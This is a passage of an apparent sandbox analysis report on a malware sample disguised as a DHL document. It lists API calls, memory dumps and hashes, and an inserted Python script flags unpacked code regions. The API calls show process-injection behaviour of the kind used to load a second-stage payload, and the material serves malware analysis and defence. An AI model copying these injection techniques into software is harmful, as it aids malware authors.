                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2800547568-0
                                                                                        • Opcode ID: 4de4837a59d454991655f82d9caf5d63b95209cf1d4c5aa017e54293e38b9272
                                                                                        • Instruction ID: 4b5005f46f4135a31d95b413264bedeeb5ec07582204549ea9d057daebf6c7f5
                                                                                        • Opcode Fuzzy Hash: 4de4837a59d454991655f82d9caf5d63b95209cf1d4c5aa017e54293e38b9272
                                                                                        • Instruction Fuzzy Hash: 96F0BB35902A249ADB10FF75B8017AF77E06F41374F209148E464AB9D1CFFC49457B51
                                                                                        APIs
                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 013EB89B
                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 013EB931
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 013EB953
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1397551629.00000000013E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 013E9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e9000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 2438371351-0
                                                                                        • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                        • Instruction ID: c814b8a8b9cf1c35f76e8f365b709c35c8c33eebb1ff524bd885e6108f88237c
                                                                                        • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                        • Instruction Fuzzy Hash: EF12DE24E18658C6EB24DF64D8547DEB272EF68300F1090E9D10DEB7A4E77A4F81CB5A
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                        • Instruction ID: 40be426aa71f4153e06edb39912072d535c9c64ea9bf3413d25c2de7f827458b
                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                        • Instruction Fuzzy Hash: EC31F7B0A001159FC718DF09E484969FBA6FB49300B3487A6E81ACBB52D731EEC1DBC1
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: e3c1e3544595939795b41efdc36a6d21c8ea64bc43a92859454d95fbf5fe996a
                                                                                        • Instruction ID: 1990291ea8d25e3b5fabbe9217d8941a496f9a08de412bf328caa916b941a457
                                                                                        • Opcode Fuzzy Hash: e3c1e3544595939795b41efdc36a6d21c8ea64bc43a92859454d95fbf5fe996a
                                                                                        • Instruction Fuzzy Hash: AF4107745083519FDB14DF14C448B1ABBE0BF45318F1988ACE8998B7A2C732ED45CF52
                                                                                        APIs
                                                                                          • Part of subcall function 00C04BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00C04BEF
                                                                                          • Part of subcall function 00C2525B: __wfsopen.LIBCMT ref: 00C25266
                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00CC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C04E0F
                                                                                          • Part of subcall function 00C04B6A: FreeLibrary.KERNEL32(00000000), ref: 00C04BA4
                                                                                          • Part of subcall function 00C04C70: _memmove.LIBCMT ref: 00C04CBA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Free$Load__wfsopen_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 1396898556-0
                                                                                        • Opcode ID: 48b87919e5072b809b50573897f35432eedca439ce41812a23c25be7cabb5fa4
                                                                                        • Instruction ID: b6f6f3478abc6ee75adeea43f43167fb29a438e9d8b8f10a2d51d6cfe6525ce5
                                                                                        • Opcode Fuzzy Hash: 48b87919e5072b809b50573897f35432eedca439ce41812a23c25be7cabb5fa4
                                                                                        • Instruction Fuzzy Hash: 9F11A771640205ABCF19BF70D816F6FB7A9AF84710F10842DF652A71C1DA759A01EB91
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: 7b383225ae80d2c39dfcbc52b09baa0089d80b094d243a951a582bee64eaa005
                                                                                        • Instruction ID: d9d2b9698585856c25575497b6c255e2c65ada07950534f23a250f675c706b60
                                                                                        • Opcode Fuzzy Hash: 7b383225ae80d2c39dfcbc52b09baa0089d80b094d243a951a582bee64eaa005
                                                                                        • Instruction Fuzzy Hash: 1B2164B4908301DFDB14DF24C844B1ABBE0BF88314F15886CF89A977A2C731E849DB92
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        • Opcode ID: 8552a27d75c028384bb5dded52737eaba16b17fc97a4acef3cde4278dbd9ffc2
                                                                                        • Instruction ID: 6eae83463486564e05c856cd1365bbf401dfca9a060d5e2c8dca335743ab85af
                                                                                        • Opcode Fuzzy Hash: 8552a27d75c028384bb5dded52737eaba16b17fc97a4acef3cde4278dbd9ffc2
                                                                                        • Instruction Fuzzy Hash: 440149B26053016EC3249F39DC06FA7BB94DB04360F10862EF62ACA5D1EA31F940D790
                                                                                        APIs
                                                                                        • __lock_file.LIBCMT ref: 00C248A6
                                                                                          • Part of subcall function 00C28B28: __getptd_noexit.LIBCMT ref: 00C28B28
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2597487223-0
                                                                                        • Opcode ID: 7b3da71ce0619002326f074b15d0ca0a9091b7e451ce781638602c06a9302e63
                                                                                        • Instruction ID: 06a84ccc608707440ed0a523965287b48ff2c59e6c03c9c5da773354ff11fb98
                                                                                        • Opcode Fuzzy Hash: 7b3da71ce0619002326f074b15d0ca0a9091b7e451ce781638602c06a9302e63
                                                                                        • Instruction Fuzzy Hash: 2DF02231811229EBDF15FFB4AC063EE37A0AF01321F008414F420DAAC1DBB88A50EB51
                                                                                        APIs
                                                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C207B0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongNamePath
                                                                                        • String ID:
                                                                                        • API String ID: 82841172-0
                                                                                        • Opcode ID: cc92939d9ad6baa940f55c3f7fc9e7241179a6f2a3c3f83fbfee1b416d759f60
                                                                                        • Instruction ID: a55b2b0a5eca5ea3674db5ab270772d1c801663eb9a2ee946b2313c4f73b1e0e
                                                                                        • Opcode Fuzzy Hash: cc92939d9ad6baa940f55c3f7fc9e7241179a6f2a3c3f83fbfee1b416d759f60
                                                                                        • Instruction Fuzzy Hash: B3F0E2368000389BCB11CB54E841AEAB368FF85770F2401A6FC04D7920EA308E5AC791
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(?,?,00CC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C04E7E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID:
                                                                                        • API String ID: 3664257935-0
                                                                                        • Opcode ID: 6f469abbc60852dc6996b2455b476888c0e2fd8b5ddb4f571fc2304d9ac30bbe
                                                                                        • Instruction ID: d9a43e1d6742399c9e121623fd63f4a3a3250fb9fbbc147b0951120ece699769
                                                                                        • Opcode Fuzzy Hash: 6f469abbc60852dc6996b2455b476888c0e2fd8b5ddb4f571fc2304d9ac30bbe
                                                                                        • Instruction Fuzzy Hash: 5DF039B1501711CFCB389F65E494817FBE5BF143693208A3EE2F682660C732A940DF40
                                                                                        APIs
                                                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C207B0
                                                                                          • Part of subcall function 00C07BCC: _memmove.LIBCMT ref: 00C07C06
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongNamePath_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 2514874351-0
                                                                                        • Opcode ID: bb962db1f76c4c85b344bf2d4b6240316efb9878be5595b3290092714b168313
                                                                                        • Instruction ID: e9ac6792ec0325d033325fdb3abed4fd91e9cb27c431afa77d05c351d71bb245
                                                                                        • Opcode Fuzzy Hash: bb962db1f76c4c85b344bf2d4b6240316efb9878be5595b3290092714b168313
                                                                                        • Instruction Fuzzy Hash: 7FE0CD369042285BC720D6599C05FEA77DDDFC87A0F0541B5FC0CD7244DD60AC8086D0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wfsopen
                                                                                        • String ID:
                                                                                        • API String ID: 197181222-0
                                                                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                        • Instruction ID: a04d1ba9693d203cb7bb6ad8338777d16af340eacbeaf105c69fc0bda244a6a5
                                                                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                        • Instruction Fuzzy Hash: 42B0927644020CBBCE012A82FC02A5A3B199B41764F408020FB0C185A2A673A664AA89
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(000001F4), ref: 013EC0F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1397551629.00000000013E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 013E9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e9000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID:
                                                                                        • API String ID: 3472027048-0
                                                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                        • Instruction ID: 433c0f287c6115abaf551c1ef41448fdb323bb228e482ee0a62cdc171cbc037b
                                                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                        • Instruction Fuzzy Hash: 4DE0E67494020DDFDB00EFB4D54D69E7FF4EF04301F100161FD01D2281D6309D508A62
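The Sleep(0x1F4) call above is the first function in this listing whose Memory Dump Source is not the AutoIt image at 0x00C00000: it sits at 0x013E9000 in a region the report marks "based on PE: false", and the dump file name carries protection 0x00000040 (PAGE_EXECUTE_READWRITE) and region type 0x00020000 (MEM_PRIVATE), whereas every dump from the stub carries 0x20 (PAGE_EXECUTE_READ) or 0x02/0x04 with type 0x01000000 (MEM_IMAGE). Executable private memory with no backing PE is where an unpacked or injected second stage lives, so triaging a report by that attribute alone is a quick way to locate the payload dumps. The script below is an added example, not part of the Joe Sandbox report or its plugin: it parses .sdmp names into base/protection/type and flags executable regions that are not image-backed. The field layout is inferred from the names on this page together with the standard winnt.h constants; the two fields it ignores (the sixth and eighth) have unknown meaning, and that layout is an assumption. The sample names are the two source-file names shown in this section.

```python
"""Flag Joe Sandbox memory dumps (.sdmp) that hold executable code outside any PE image.

Added example for triaging sandbox reports; not code from Joe Sandbox.
ASSUMPTION: sdmp name layout is pid.run.dumpid.base.protect.<unknown>.type.<unknown>.sdmp,
inferred from the names on this page plus winnt.h memory constants.
"""
import re
from dataclasses import dataclass

# Memory protection flags from winnt.h
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
EXECUTABLE_MASK = (PAGE_EXECUTE | PAGE_EXECUTE_READ
                   | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)

# Region types reported in MEMORY_BASIC_INFORMATION.Type
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000
TYPE_NAMES = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

# Assumed field layout (see module docstring); f6 and f8 are kept but not interpreted.
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<run>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    base: int
    protect: int
    mem_type: int

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXECUTABLE_MASK)

    @property
    def image_backed(self) -> bool:
        return self.mem_type == MEM_IMAGE

    @property
    def suspicious(self) -> bool:
        # Executable pages that belong to no loaded PE image: the usual home of an
        # unpacked or injected second stage (here, what the AutoIt stub decrypts).
        return self.executable and not self.image_backed


def parse_sdmp_name(name: str) -> DumpRegion:
    """Parse one .sdmp file name into a DumpRegion; raise ValueError on a bad name."""
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not an sdmp name: {name!r}")
    return DumpRegion(
        pid=int(m["pid"], 16),
        base=int(m["base"], 16),
        protect=int(m["protect"], 16),
        mem_type=int(m["type"], 16),
    )


def find_unbacked_code(names):
    """Return (name, DumpRegion) pairs for executable regions not backed by a PE image."""
    hits = []
    for name in names:
        region = parse_sdmp_name(name)
        if region.suspicious:
            hits.append((name, region))
    return hits


# Constructed input: the two Source File names that appear in this part of the report.
SAMPLE_NAMES = [
    "00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1397551629.00000000013E9000.00000040.00000020.00020000.00000000.sdmp",
]

if __name__ == "__main__":
    for name, region in find_unbacked_code(SAMPLE_NAMES):
        kind = TYPE_NAMES.get(region.mem_type, hex(region.mem_type))
        print(f"{region.base:#010x} protect={region.protect:#x} type={kind} <- {name}")
```

Run against the two names it flags only the 0x013E9000 dump; feed it every Source File and Associated name in a report and the hits are the dumps worth opening first for YARA and string extraction (here the FormBook payload the Yara rule in the signature list matched).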
                                                                                        APIs
                                                                                          • Part of subcall function 00C02612: GetWindowLongW.USER32(?,000000EB), ref: 00C02623
                                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00C8CB37
                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C8CB95
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C8CBD6
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C8CC00
                                                                                        • SendMessageW.USER32 ref: 00C8CC29
                                                                                        • _wcsncpy.LIBCMT ref: 00C8CC95
                                                                                        • GetKeyState.USER32(00000011), ref: 00C8CCB6
                                                                                        • GetKeyState.USER32(00000009), ref: 00C8CCC3
                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C8CCD9
                                                                                        • GetKeyState.USER32(00000010), ref: 00C8CCE3
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C8CD0C
                                                                                        • SendMessageW.USER32 ref: 00C8CD33
                                                                                        • SendMessageW.USER32(?,00001030,?,00C8B348), ref: 00C8CE37
                                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00C8CE4D
                                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00C8CE60
                                                                                        • SetCapture.USER32(?), ref: 00C8CE69
                                                                                        • ClientToScreen.USER32(?,?), ref: 00C8CECE
                                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00C8CEDB
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C8CEF5
                                                                                        • ReleaseCapture.USER32 ref: 00C8CF00
                                                                                        • GetCursorPos.USER32(?), ref: 00C8CF3A
                                                                                        • ScreenToClient.USER32(?,?), ref: 00C8CF47
                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C8CFA3
                                                                                        • SendMessageW.USER32 ref: 00C8CFD1
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C8D00E
                                                                                        • SendMessageW.USER32 ref: 00C8D03D
                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C8D05E
                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00C8D06D
                                                                                        • GetCursorPos.USER32(?), ref: 00C8D08D
                                                                                        • ScreenToClient.USER32(?,?), ref: 00C8D09A
                                                                                        • GetParent.USER32(?), ref: 00C8D0BA
                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C8D123
                                                                                        • SendMessageW.USER32 ref: 00C8D154
                                                                                        • ClientToScreen.USER32(?,?), ref: 00C8D1B2
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C8D1E2
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C8D20C
                                                                                        • SendMessageW.USER32 ref: 00C8D22F
                                                                                        • ClientToScreen.USER32(?,?), ref: 00C8D281
                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00C8D2B5
                                                                                          • Part of subcall function 00C025DB: GetWindowLongW.USER32(?,000000EB), ref: 00C025EC
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C8D351
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                        • String ID: @GUI_DRAGID$@U=u$F
                                                                                        • API String ID: 3977979337-1007936534
                                                                                        • Opcode ID: 2b59fef97770a0785c73cf8c922c7496e2fcd0a46bb7e3acf73450a510d80842
                                                                                        • Instruction ID: 9ff86fe9e045143ba1118b343e2a9143cc39d20c3950d7996eab0255664e4b65
                                                                                        • Opcode Fuzzy Hash: 2b59fef97770a0785c73cf8c922c7496e2fcd0a46bb7e3acf73450a510d80842
                                                                                        • Instruction Fuzzy Hash: F442AE74204640AFDB20EF24C888FAABBE5FF49318F14062DF569872B1C731E941DB69
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove$_memset
                                                                                        • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                                        • API String ID: 1357608183-1798697756
                                                                                        • Opcode ID: 34deec70bb005ef2ce818e3b484ca8fed8fce22e6557f1c28de9927ea339f41b
                                                                                        • Instruction ID: ab7579a34f0e3a63a0002ca4cf0a081b2d6096b8352eff87ba5064917866af88
                                                                                        • Opcode Fuzzy Hash: 34deec70bb005ef2ce818e3b484ca8fed8fce22e6557f1c28de9927ea339f41b
                                                                                        • Instruction Fuzzy Hash: C493C079A04219DBDB24CF98C881BEDB7B1FF49311F24816AED15AB280E7709EC5DB44
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(00000000,?), ref: 00C048DF
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C3D665
                                                                                        • IsIconic.USER32(?), ref: 00C3D66E
                                                                                        • ShowWindow.USER32(?,00000009), ref: 00C3D67B
                                                                                        • SetForegroundWindow.USER32(?), ref: 00C3D685
                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C3D69B
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00C3D6A2
                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C3D6AE
